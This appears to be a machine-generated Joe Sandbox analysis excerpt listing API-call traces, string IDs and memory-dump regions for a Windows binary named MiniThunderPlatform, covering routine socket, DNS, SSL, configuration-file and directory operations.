                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(adns_fail_cache,enable,00000000,-00000004), ref: 100559BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,00000000,10245167,000000FF,10055D61,?,00000000), ref: 100559CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100559DC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$CountH_prologPrivateProfileTickV01@Y?$basic_string@
                                                                                                                                              • String ID: adns_fail_cache$asyn_frame.dat$enable
                                                                                                                                              • API String ID: 2769812439-4188322525
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437158
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437171
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71 ref: 00437197
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71 ref: 004371B0
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004371D7
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004371F0
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437218
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437231
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$??0?$basic_string@_?empty@?$basic_string@_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 556388284-0
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1005BE90
                                                                                                                                              • gethostbyname.WS2_32(?), ref: 1005BEB5
                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 1005BEEE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 1005BEFB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1005BF18
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1005BF5C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1005BF6C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalD@2@@std@@D@std@@SectionU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@CurrentEnterLeaveThreadgethostbynameinet_ntoa
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748678878-0
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,?), ref: 10045115
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$_connect_op_ptr == NULL$_handshake_status != 2$_operation_ptr == NULL$thunder_assert
                                                                                                                                              • API String ID: 1972284567-1913342989
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(SCHANNEL.DLL,?,?,?,?,?,10243F10,000000FF), ref: 10044E56
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 10044E72
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,10243F10,000000FF), ref: 10044E7F
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,10243F10,000000FF), ref: 10044EAC
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                              • String ID: InitSecurityInterfaceA$SCHANNEL.DLL
                                                                                                                                              • API String ID: 1866314245-621169374
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 10048B62
                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292,?), ref: 10048B6F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error,?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292), ref: 10048B80
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10048BA7
                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00001002,?,00000004), ref: 10048BC4
                                                                                                                                              Strings
                                                                                                                                              • create socket object error, xrefs: 10048B75
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@?append@?$basic_string@ErrorExceptionLastThrowV01@V01@@V12@V12@@Y?$basic_string@setsockoptsocket
                                                                                                                                              • String ID: create socket object error
                                                                                                                                              • API String ID: 3265056843-3662707707
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001F76A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001F78E
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001F7C3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001F7CF
                                                                                                                                                • Part of subcall function 1001EDAF: __EH_prolog.LIBCMT ref: 1001EDB4
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000010,?,7C3869BF,1001F7E0), ref: 1001EDF0
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE00
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE10
                                                                                                                                                • Part of subcall function 1001EDAF: GetPrivateProfileSectionNamesA.KERNEL32(?,00005000,?), ref: 1001EE35
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EE50
                                                                                                                                                • Part of subcall function 1001EDAF: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(_once,00000000), ref: 1001EE67
                                                                                                                                                • Part of subcall function 1001EDAF: GetPrivateProfileSectionA.KERNEL32(?,?,00005000,?), ref: 1001EE97
                                                                                                                                                • Part of subcall function 1001EDAF: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001EEB7
                                                                                                                                                • Part of subcall function 1001EDAF: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 1001EEC7
                                                                                                                                                • Part of subcall function 1001EDAF: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001EEE3
                                                                                                                                                • Part of subcall function 1001EDAF: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 1001EF07
                                                                                                                                                • Part of subcall function 1001EDAF: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EF14
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001F7E7
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V12@$?assign@?$basic_string@Section$H_prologPrivateProfileV01@$??1?$basic_string@??4?$basic_string@?find@?$basic_string@?find_first_of@?$basic_string@CriticalInitializeNamesV12@@Y?$basic_string@
                                                                                                                                              • String ID: stat.dat
                                                                                                                                              • API String ID: 1067293293-3030217696
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005CF10: GetNetworkParams.IPHLPAPI(?,?), ref: 1005CF62
                                                                                                                                                • Part of subcall function 1005CF10: GetNetworkParams.IPHLPAPI ref: 1005CF86
                                                                                                                                                • Part of subcall function 1005CF10: inet_addr.WS2_32(00000004), ref: 1005CFA6
                                                                                                                                                • Part of subcall function 1005CF10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000004), ref: 1005CFB6
                                                                                                                                                • Part of subcall function 1005CF10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CFE4
                                                                                                                                                • Part of subcall function 1005CF10: ??_V@YAXPAX@Z.MSVCR71(?,?,?,10245BEC,000000FF,100582FE,?), ref: 1005D000
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10058373
                                                                                                                                                • Part of subcall function 10057620: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(774D23A0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10057664
                                                                                                                                                • Part of subcall function 10057620: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10057675
                                                                                                                                                • Part of subcall function 10057620: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100576E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?), ref: 10058393
                                                                                                                                                • Part of subcall function 10053B90: inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                                • Part of subcall function 10053B90: htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                                • Part of subcall function 10053B90: sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                                • Part of subcall function 10053B90: WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 10058482
                                                                                                                                                • Part of subcall function 100569C0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000000,10058AC9,?,?,?,?,?,00000000,00000000,?), ref: 100569DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 100583F4
                                                                                                                                                • Part of subcall function 100579A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,102450B0,000000FF), ref: 100579FE
                                                                                                                                                • Part of subcall function 10057920: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,00000014,00000000,0000000C,?,102453B9,000000FF,10057A8F,?,00000014,?,00000014), ref: 10057943
                                                                                                                                                • Part of subcall function 10057C90: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,0000000C,?,00000014,?,?,00000014,10058241,?,?), ref: 10057CB7
                                                                                                                                                • Part of subcall function 10057860: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,102453B9,000000FF,100586C5), ref: 10057897
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100584DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10058556
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$CountD@1@@std@@D@2@@0@0@NetworkParamsTickV?$basic_string@inet_addr$??$???$?8?assign@?$basic_string@ErrorLastV12@V12@@htonssendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 903993397-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1001671E: memcmp.MSVCR71(?,?,00000010), ref: 10016728
                                                                                                                                                • Part of subcall function 10018110: __EH_prolog.LIBCMT ref: 10018115
                                                                                                                                                • Part of subcall function 10018110: RtlLeaveCriticalSection.NTDLL(?), ref: 10018172
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100190DC
                                                                                                                                              • StringFromIID.COMBASE(?,?), ref: 10019105
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 1001911F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 10019145
                                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 1001914E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10019157
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@CountCriticalFreeFromH_prologLeaveSectionStringTaskTicklstrlenmemcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3768262621-0
                                                                                                                                              APIs
                                                                                                                                              • GetNetworkParams.IPHLPAPI(?,?), ref: 1005CF62
                                                                                                                                              • GetNetworkParams.IPHLPAPI ref: 1005CF86
                                                                                                                                              • inet_addr.WS2_32(00000004), ref: 1005CFA6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000004), ref: 1005CFB6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CFE4
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,10245BEC,000000FF,100582FE,?), ref: 1005D000
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@NetworkParamsU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@inet_addr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1056547183-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1002C6BC
                                                                                                                                                • Part of subcall function 1002C68F: GetFileAttributesA.KERNEL32(?,1002C6D8,?), ref: 1002C6A2
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,7C3869BF,00000000), ref: 1002C6FF
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000005C,7C3F18B8), ref: 1002C710
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1002C729
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 1002C74C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002C757
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CreateDirectory$??1?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@AttributesFileH_prologV12@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2536239797-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long), ref: 1007A83D
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1007A84F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1007A86B
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1007A888
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              APIs
                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML; ; NW; ; ; LW),00000001,00000000,00000000), ref: 00430754
                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00430777
                                                                                                                                              • SetSecurityInfo.ADVAPI32(?,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0043079C
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004307BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Security$Descriptor$ConvertFreeInfoLocalSaclString
                                                                                                                                              • String ID: S:(ML; ; NW; ; ; LW)
                                                                                                                                              • API String ID: 3116297227-162786968
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10048B40: socket.WS2_32(00000002,00000001,00000006), ref: 10048B62
                                                                                                                                                • Part of subcall function 10048B40: WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292,?), ref: 10048B6F
                                                                                                                                                • Part of subcall function 10048B40: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error,?,?,?,?,?,?,?,?,?,?,?,00000000,10244469,000000FF,10049292), ref: 10048B80
                                                                                                                                                • Part of subcall function 10048B40: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10048BA7
                                                                                                                                                • Part of subcall function 10048B40: setsockopt.WS2_32(00000000,0000FFFF,00001002,?,00000004), ref: 10048BC4
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • AcceptEx.MSWSOCK(?,00000000,000000FF,00000000,00000020,00000020,?,?), ref: 100492F5
                                                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000,00000020,00000020,?,?,00000000,00000000), ref: 100492FF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn accept request error), ref: 1004931F
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10049346
